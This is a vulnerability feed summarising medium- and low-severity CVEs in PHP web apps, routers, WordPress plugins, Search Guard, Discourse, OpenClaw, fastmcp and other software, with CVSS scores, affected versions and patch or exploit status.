Path traversal in CMS Made Simple UserGuide Module XML Import functionality allows authenticated high-privilege attackers to manipulate file operations in the _copyFilesToFolder function, enabling arbitrary file placement on the server with limited confidentiality and integrity impact. The vulnerability affects CMS Made Simple up to version 2.2.22, requires high-level privileges to exploit remotely, and vendor has confirmed a fix for a future release; publicly available exploit code exists but real-world risk remains moderate due to privilege requirements.

PHP Path Traversal
CVE-2026-5198 MEDIUM CVSS 6.9
SQL injection in code-projects Student Membership System 1.0 admin login allows unauthenticated remote attackers to bypass authentication and access sensitive data via crafted username/password parameters at /admin/index.php. Publicly available exploit code exists (VulDB 354296, GitHub POC), enabling trivial exploitation with no attack complexity. CVSS 7.3 reflects network-accessible attack with low confidentiality/integrity/availability impact. No vendor-released patch identified at time of analysis.

SQLi PHP
CVE-2026-5197 MEDIUM CVSS 5.3
SQL injection in code-projects Student Membership System 1.0 allows authenticated remote attackers to execute arbitrary SQL queries via the ID parameter in /delete_user.php, enabling unauthorized data exfiltration or manipulation. The vulnerability has CVSS score 5.3 (medium severity) with publicly available exploit code, though it requires authenticated access (PR:L) and carries low confidentiality, integrity, and availability impact per CVSS v4.0 assessment.

PHP SQLi
CVE-2026-5196 MEDIUM CVSS 5.3
SQL injection in code-projects Student Membership System 1.0 allows authenticated remote attackers to execute arbitrary SQL commands via the ID parameter in /delete_member.php, resulting in limited confidentiality and integrity impact. Publicly available exploit code exists, and the vulnerability has been disclosed; however, active exploitation has not been confirmed by CISA. The attack requires valid authentication credentials but can be initiated over the network with minimal complexity.

PHP SQLi
CVE-2026-5195 MEDIUM CVSS 6.9
SQL injection in code-projects Student Membership System 1.0 allows unauthenticated remote attackers to extract, modify, or delete database contents via the User Registration Handler component. The vulnerability has a CVSS score of 7.3 with network-based attack vector and low complexity, requiring no privileges or user interaction. EPSS data not available; no CISA KEV listing indicates confirmed actively exploited status is unknown. Publicly available exploit code exists per researcher disclosure on GitHub, elevating real-world risk for organizations running this application.

SQLi
CVE-2026-5186 MEDIUM CVSS 4.8
Double free vulnerability in Nothings stb library (up to version 2.30) in the multi-frame GIF file handler function stbi__load_gif_main allows local authenticated attackers to cause information disclosure and memory corruption. Public exploit code is available. The vendor did not respond to early disclosure notification, leaving affected users without an official patch.

Information Disclosure
CVE-2026-5185 MEDIUM CVSS 4.8
Heap-based buffer overflow in Nothings stb_image library up to version 2.30 in the stbi__gif_load_next function allows local authenticated attackers to cause memory corruption with limited confidentiality, integrity, and availability impact. Public exploit code is available; however, the vulnerability requires local access and authenticated privilege level, significantly limiting real-world exploitation scope. The vendor has not responded to early disclosure attempts.

Heap Overflow Buffer Overflow
CVE-2026-5184 MEDIUM CVSS 5.3
Remote command injection in TRENDnet TEW-713RE firmware up to version 1.02 allows authenticated remote attackers to execute arbitrary commands via the admuser parameter in the /goform/setSysAdm endpoint. Publicly available exploit code exists, and the vendor has not responded to early disclosure attempts, leaving all affected devices without a vendor-released patch.

Command Injection
CVE-2026-5183 MEDIUM CVSS 5.3
Command injection in TRENDnet TEW-713RE firmware up to version 1.02 allows authenticated remote attackers to execute arbitrary commands via manipulation of the dest parameter in the /goform/addRouting function. The vulnerability has a CVSS score of 6.3 and publicly available exploit code exists; the vendor has not responded to early disclosure attempts, leaving affected devices without an official patch.

Command Injection
CVE-2026-5182 MEDIUM CVSS 6.9
SQL injection in SourceCodester Teacher Record System 1.0 allows unauthenticated remote attackers to execute arbitrary SQL commands via the 'searchteacher' parameter in the Parameter Handler component. The vulnerability has a publicly available exploit (GitHub POC published), enabling extraction of sensitive data, modification of database records, or potential system compromise. CVSS 7.3 (High severity) with low attack complexity and no authentication required indicates significant exploitation risk.

SQLi
CVE-2026-5181 MEDIUM CVSS 5.3
Unrestricted file upload in SourceCodester Simple Doctors Appointment System up to version 1.0 allows authenticated remote attackers to upload arbitrary files via the img parameter in /doctors_appointment/admin/ajax.php?action=save_category, potentially leading to remote code execution. The vulnerability has publicly available exploit code and carries a CVSS score of 5.3 with limited impact scope, though it requires valid login credentials to exploit.

PHP File Upload
CVE-2026-5180 MEDIUM CVSS 6.9
SQL injection in SourceCodester Simple Doctors Appointment System 1.0 allows unauthenticated remote attackers to compromise confidentiality, integrity, and availability via the /admin/ajax.php login endpoint. Attackers manipulate the 'email' parameter to execute arbitrary SQL commands. Publicly available exploit code exists (GitHub POC published), significantly lowering the attack barrier. The CVSS score of 7.3 reflects network-based exploitation requiring low complexity and no privileges, with partial impact across all CIA triad elements. No CISA KEV listing at time of analysis, but the combination of public exploit and authentication bypass capability makes this a realistic threat to internet-facing instances.

SQLi PHP
CVE-2026-5179 MEDIUM CVSS 6.9
SQL injection in SourceCodester Simple Doctors Appointment System 1.0 allows remote unauthenticated attackers to extract, modify, or delete database contents via the Username parameter in /admin/login.php. Publicly available exploit code exists (GitHub POC), enabling trivial exploitation with no authentication required. CVSS 7.3 reflects low attack complexity and network accessibility. EPSS data unavailable, but public POC significantly elevates real-world risk for internet-facing installations.

PHP SQLi
CVE-2026-5178 MEDIUM CVSS 5.3
Command injection in Totolink A3300R firmware 17.0.0cu.557_b20221024 allows authenticated remote attackers to execute arbitrary commands via the vlanPriLan3 parameter in the setIptvCfg function of /cgi-bin/cstecgi.cgi. The vulnerability has a publicly available exploit and carries moderate severity (CVSS 6.3) with confirmed exploitability signals (EPSS P/E indicator). Successful exploitation grants an authenticated attacker the ability to manipulate VLAN priority settings and potentially gain code execution on the affected router.

Command Injection
CVE-2026-5177 MEDIUM CVSS 5.3
Command injection in Totolink A3300R 17.0.0cu.557_b20221024 allows authenticated remote attackers to execute arbitrary commands via manipulation of the rxRate parameter in the setWiFiBasicCfg function at /cgi-bin/cstecgi.cgi. The vulnerability has a CVSS score of 6.3 with publicly available exploit code, making it a moderate-priority issue for affected device administrators despite requiring prior authentication.

Command Injection
CVE-2026-5176 MEDIUM CVSS 6.9
Command injection in Totolink A3300R router firmware 17.0.0cu.557_b20221024 allows unauthenticated remote attackers to execute arbitrary system commands via the setSyslogCfg function in /cgi-bin/cstecgi.cgi. Public exploit code is available on GitHub, significantly lowering the barrier to exploitation. The CVSS vector (AV:N/AC:L/PR:N) confirms network-accessible exploitation with low complexity and no authentication required, enabling pre-authentication remote code execution on affected routers.

Command Injection
CVE-2026-4819 MEDIUM CVSS 4.9
Search Guard FLX versions 1.0.0 through 4.0.1 leak user credentials into audit logs when users authenticate through Kibana, exposing plaintext authentication material to any system administrator or user with log access. The vulnerability requires high-privilege access to exploit and affects only confidentiality, but the presence of credentials in audit logs creates a persistent information disclosure risk that persists across backup and archival systems.

Information Disclosure Elastic
CVE-2026-4818 MEDIUM CVSS 6.8
Search Guard FLX versions 3.0.0 through 4.0.1 allow authenticated users with insufficient privileges to execute unauthorized management operations on data streams due to improper access control, enabling privilege escalation with high confidentiality and integrity impact. The CVSS score of 6.8 reflects network accessibility and moderate attack complexity, with active data stream manipulation possible after authentication. No public exploit code or confirmed active exploitation has been identified at this time.

Authentication Bypass
CVE-2026-4799 MEDIUM CVSS 4.3
Open redirect in Search Guard FLX up to version 4.0.1 allows unauthenticated remote attackers to craft malicious requests that redirect users to untrusted URLs, enabling phishing and credential theft attacks. The vulnerability requires user interaction (clicking a redirected link) and affects all versions through 4.0.1. No public exploit code or active exploitation has been confirmed at time of analysis.

Open Redirect
CVE-2026-4146 MEDIUM CVSS 6.1
Reflected Cross-Site Scripting in Loco Translate WordPress plugin versions up to 2.8.2 allows unauthenticated attackers to inject arbitrary web scripts via the 'update_href' parameter due to insufficient input sanitization and output escaping. The vulnerability requires user interaction (clicking a malicious link) to execute, affecting WordPress sites with the plugin installed. CVSS 6.1 reflects moderate severity with network-accessible attack vector and cross-site scope impact on confidentiality and integrity.

WordPress XSS
CVE-2026-3881 MEDIUM CVSS 5.8
Unauthenticated Server-Side Request Forgery (SSRF) in Performance Monitor WordPress plugin through version 1.0.6 allows remote attackers to perform arbitrary HTTP requests by exploiting insufficient parameter validation. The vulnerability enables attackers without authentication to interact with internal network resources and services accessible from the WordPress server, potentially leading to information disclosure, lateral movement, or interaction with backend systems.

WordPress SSRF
CVE-2026-3468 MEDIUM CVSS 4.8
Stored Cross-Site Scripting (XSS) in SonicWall Email Security allows authenticated admin users to inject and execute arbitrary JavaScript code through improper input sanitization during web page generation. The vulnerability affects all versions of SonicWall Email Security appliance and requires admin-level authentication to exploit, limiting immediate exposure but posing significant risk to organizations where admin accounts are compromised or insider threats exist.

Sonicwall XSS
CVE-2026-3191 MEDIUM CVSS 5.4
The Minify HTML WordPress plugin (versions up to 2.1.12) contains a Cross-Site Request Forgery (CSRF) vulnerability in the 'minify_html_menu_options' function due to missing nonce validation, allowing unauthenticated attackers to modify plugin settings if a site administrator is tricked into clicking a malicious link. The attack requires user interaction (UI:R) but can degrade site availability or integrity by altering minification behavior. No public exploit code or active exploitation has been confirmed, though the vulnerability is tracked by CISA-recognized security researchers.

WordPress CSRF
CVE-2026-3139 MEDIUM CVSS 4.3
User Profile Builder plugin for WordPress up to version 3.15.5 allows authenticated subscribers and above to reassign ownership of arbitrary posts and attachments through insecure direct object reference (IDOR) in the wppb_save_avatar_value() function. The vulnerability lacks validation on user-controlled keys, enabling privilege escalation where low-privileged users can modify post_author fields to take control of content created by other users. No public exploit code or active exploitation has been identified at time of analysis.

WordPress Authentication Bypass
CVE-2026-2950 MEDIUM CVSS 6.5
Prototype pollution in Lodash 4.17.23 and earlier allows unauthenticated remote attackers to delete properties from built-in prototypes (Object.prototype, Number.prototype, String.prototype) via array-wrapped path segments in _.unset and _.omit functions, bypassing the incomplete fix for CVE-2025-13465. The vulnerability has a CVSS score of 6.5 with low integrity and availability impact; no public exploit code or active exploitation has been confirmed at time of analysis.

Prototype Pollution Authentication Bypass
CVE-2026-2480 MEDIUM CVSS 6.4
Stored cross-site scripting (XSS) in WP Shortcodes Plugin - Shortcodes Ultimate through version 7.4.10 allows authenticated contributors and above to inject arbitrary JavaScript via the 'max_width' attribute of the su_box shortcode due to insufficient input sanitization and output escaping. The injected scripts persist in page content and execute for all users viewing the affected page, enabling attackers with contributor-level WordPress access to compromise site visitors without additional user interaction.

WordPress XSS
CVE-2026-1877 MEDIUM CVSS 6.1
Cross-site request forgery in Auto Post Scheduler WordPress plugin versions up to 1.84 allows unauthenticated attackers to modify plugin settings and inject malicious scripts by tricking site administrators into clicking a malicious link, due to missing nonce validation in the aps_options_page function. The vulnerability combines CSRF with stored XSS capability, affecting any WordPress site running the vulnerable plugin. CVSS 6.1 reflects the requirement for user interaction and the limited direct impact, though the ability to inject web scripts poses a meaningful risk to site integrity and user security.

WordPress CSRF XSS
CVE-2026-1834 MEDIUM CVSS 6.4
Stored cross-site scripting in Ibtana - WordPress Website Builder plugin up to version 1.2.5.7 allows authenticated contributors to inject arbitrary JavaScript via the 'ive' shortcode due to insufficient input sanitization and output escaping. When an injected page is accessed by any user, the malicious script executes in their browser with the privileges of their WordPress session, enabling session hijacking, credential theft, or administrative actions depending on victim privileges. No public exploit code or active exploitation has been confirmed at the time of analysis.

WordPress XSS
CVE-2026-1797 MEDIUM CVSS 5.3
Unauthenticated attackers can directly access view PHP files in the Truebooker WordPress plugin (versions up to 1.1.4) to disclose sensitive information, such as user data or system configuration details exposed in those templates. The vulnerability requires only network access and no authentication, making it trivially exploitable via simple HTTP requests to exposed PHP files. No public exploit code or active exploitation has been confirmed at this time.

WordPress Information Disclosure Authentication Bypass PHP
CVE-2026-1710 MEDIUM CVSS 6.5
Unauthenticated attackers can modify WooPayments plugin settings through a missing capability check in the 'save_upe_appearance_ajax' AJAX function, affecting all versions up to and including 10.5.1. This allows remote attackers to alter payment appearance configurations without authentication, potentially disrupting payment processing or customer experience. No public exploit code or active exploitation has been identified at time of analysis.

WordPress Authentication Bypass
CVE-2025-64340 MEDIUM CVSS 6.7
Command injection in fastmcp install allows Windows users to execute arbitrary commands via shell metacharacters in server names. When installing a server with a name containing characters like `&` (e.g., `fastmcp install claude-code` with server name `test&calc`), the metacharacter is interpreted by cmd.exe during execution of .cmd wrapper scripts, leading to arbitrary command execution with user privileges. This affects Windows systems running claude or gemini CLI installations; macOS and Linux are unaffected. A patch is available via GitHub PR #3522.

Python Command Injection Apple Microsoft
CVE-2025-62184 MEDIUM CVSS 4.8
Stored cross-site scripting (XSS) in Pega Platform versions 8.1.0 through 25.1.0 allows authenticated administrative users with extensive access rights to inject malicious scripts into user interface components, potentially compromising the confidentiality of other users who interact with affected UI elements. The vulnerability requires high-privilege administrative access and user interaction to exploit, resulting in a CVSS 4.8 (low severity) with no integrity or availability impact. No public exploit code or active exploitation has been identified at time of analysis.

XSS
CVE-2025-41357 MEDIUM CVSS 5.1
Reflected Cross-Site Scripting (XSS) in Anon Proxy Server v0.104 allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser via a malicious URL targeting the 'host' parameter of the /diagdns.php endpoint. An attacker can exploit this to steal session cookies, perform unauthorized actions, or redirect users to malicious content. No public exploit code or active exploitation has been confirmed at time of analysis.

XSS PHP
CVE-2025-41356 MEDIUM CVSS 5.1
Reflected XSS in Anon Proxy Server v0.104 allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser via a malicious URL targeting the 'host' parameter in /diagconnect.php, potentially enabling session hijacking or unauthorized user actions. The vulnerability requires user interaction (clicking a malicious link) and has a CVSS score of 5.1 (medium severity). No public exploit code or active exploitation has been confirmed at the time of analysis.

XSS PHP
CVE-2025-41355 MEDIUM CVSS 5.1
Reflected Cross-Site Scripting (XSS) in Anon Proxy Server v0.104 allows unauthenticated remote attackers to execute arbitrary JavaScript in victim browsers via malicious URLs targeting the 'port' and 'proxyPort' parameters in the /anon.php endpoint. Successful exploitation enables theft of session cookies and unauthorized actions on behalf of the victim. No public exploit code or active exploitation has been confirmed at time of analysis.

XSS PHP
CVE-2026-34509 LOW CVSS 2.3
Authorization bypass in OpenClaw's Microsoft Teams plugin allows unauthenticated remote attackers to circumvent sender allowlists and trigger replies in restricted Teams routes. Affecting OpenClaw versions before 2026.3.8, the flaw manifests when team/channel route allowlists contain empty groupAllowFrom parameters, causing the message handler to synthesize wildcard sender authorization instead of enforcing intended restrictions. No public exploit identified at time of analysis, though CVSS 7.5 reflects network-accessible exploitation with low complexity requiring no authentication. Vendor-released patch available in version 2026.3.8 with upstream commit 88aee916.

Authentication Bypass Microsoft
CVE-2026-34506 LOW CVSS 2.3
Authorization bypass in OpenClaw Microsoft Teams plugin (versions before 2026.3.8) permits unauthenticated attackers to circumvent sender allowlists when team/channel routes are configured with empty groupAllowFrom parameters. Remote attackers can exploit this network-accessible flaw with low complexity to trigger unauthorized message replies and access sensitive information in allowlisted Teams routes. EPSS and KEV data not available for this recent CVE; no public exploit identified at time of analysis.

Microsoft Authentication Bypass
CVE-2026-34203 LOW CVSS 2.7
Nautobot REST API user creation and modification endpoints bypass Django's configured password validation rules, allowing authenticated administrators to set or modify user passwords that fail to meet organizational security standards. Versions prior to 2.4.30 and 3.0.10 are affected; an authenticated admin with high privileges can create accounts with weak passwords despite configured AUTH_PASSWORD_VALIDATORS rules. CVSS score is 2.7 (low severity) due to requirement for authenticated administrative access; however, organizations with strict password policies relying on Nautobot's config-driven enforcement face integrity risk.

Python Brute Force Information Disclosure
CVE-2026-33073 LOW CVSS 2.0
Discourse versions 2026.1.0-2026.1.2, 2026.2.0-2026.2.1, and 2026.3.0 leak Stripe API keys across sites in multisite cluster deployments due to improper credential isolation in the discourse-subscriptions plugin, allowing authenticated users with UI access on one site to view payment credentials belonging to other sites within the same cluster. CVSS 2.0 reflects low severity (information disclosure only, requires authentication and user interaction), but the exposure of payment processor credentials carries material business risk. Patches are available in versions 2026.1.3, 2026.2.2, and 2026.3.0.

Information Disclosure
CVE-2026-32970 LOW CVSS 2.0
OpenClaw before version 2026.3.11 allows local authenticated users to bypass local authentication boundaries through a credential fallback vulnerability where unavailable local gateway.auth.token and gateway.auth.password SecretRefs are incorrectly treated as unset, enabling fallback to remote credentials in local-only mode. The vulnerability requires local access and specific misconfiguration of auth references but can result in information disclosure if an attacker selects incorrect credential sources via CLI and helper paths. No public exploit code or active exploitation has been identified.

Authentication Bypass
CVE-2026-32607 LOW CVSS 2.1
Stored cross-site scripting (XSS) in Discourse assignment UI allows authenticated users with assign permission to inject arbitrary HTML/JavaScript into user and group display names when the hidden prioritize_full_name_in_ux site setting is enabled, affecting versions 2026.1.0–2026.1.2, 2026.2.0–2026.2.1, and 2026.3.0. The injected payload executes in the browser of any user viewing an affected topic, enabling session hijacking, credential theft, or malware distribution. No active exploitation confirmed; however, the requirement for console access to enable the vulnerable setting and assign permission to exploit limits real-world impact, though the low CVSS score (2.1) reflects these constraints rather than severity of XSS itself.

XSS
CVE-2026-5115 LOW CVSS 3.6
PaperCut NG/MF embedded application on Konica Minolta multifunction devices transmits sensitive session data over an insecure communication channel, enabling session hijacking and potential credential theft or phishing attacks against end users. The vulnerability affects all versions of the embedded application and was discovered internally by PaperCut; no public exploit code or active exploitation has been confirmed at this time.

Information Disclosure
CVE-2026-4794 LOW CVSS 2.1
Stored cross-site scripting (XSS) vulnerabilities in PaperCut NG/MF versions before 25.0.10 allow authenticated administrator users to inject malicious scripts via multiple UI fields, potentially compromising other administrators' sessions and enabling unauthorized actions within the administrator context. The vulnerability requires valid administrator credentials and an active login session to exploit, limiting exposure to trusted administrative users but creating significant insider risk.

XSS
CVE-2026-3470 LOW CVSS 3.8
Database corruption in SonicWall Email Security appliance via improper input sanitization allows authenticated admin users to corrupt the application database by submitting crafted input. The vulnerability requires valid administrative credentials and affects all versions of SonicWall Email Security as indicated by the CPE wildcard matching. No CVSS scoring, public exploit code, or CISA KEV status is available at this time, limiting precise risk quantification.

Sonicwall Information Disclosure
CVE-2026-3469 LOW CVSS 2.7
SonicWall Email Security appliance becomes unresponsive due to improper input validation when an authenticated administrator submits malformed input, causing a denial of service. The vulnerability affects all versions of SonicWall Email Security and requires valid admin credentials to exploit. While CVSS scoring is unavailable, the attack vector is remote and authenticated, limiting exposure to insider threats or compromised admin accounts.

Sonicwall Information Disclosure
CVE-2026-0397 LOW CVSS 3.1
Cross-Origin Resource Sharing (CORS) misconfiguration in PowerDNS dnsdist's internal webserver allows remote attackers to extract sensitive configuration information from the dashboard through a social engineering attack targeting authenticated administrators. An attacker can trick an admin into visiting a malicious website, which then leverages the misconfigured CORS policy to read dashboard API responses containing running configuration details. The vulnerability requires the internal webserver to be enabled (disabled by default) and user interaction, resulting in limited confidentiality impact with no integrity or availability risk.

Cors Misconfiguration Information Disclosure
CVE-2026-0396 LOW CVSS 3.1
HTML injection in DNSdist internal web dashboard allows remote unauthenticated attackers to inject malicious content via crafted DNS queries when domain-based dynamic rules are enabled, requiring user interaction to exploit. This affects all DNSdist versions with vulnerable rule functionality and carries low integrity impact with no confidentiality or availability consequences.

XSS

Today's Vulnerabilities Vulnerabilities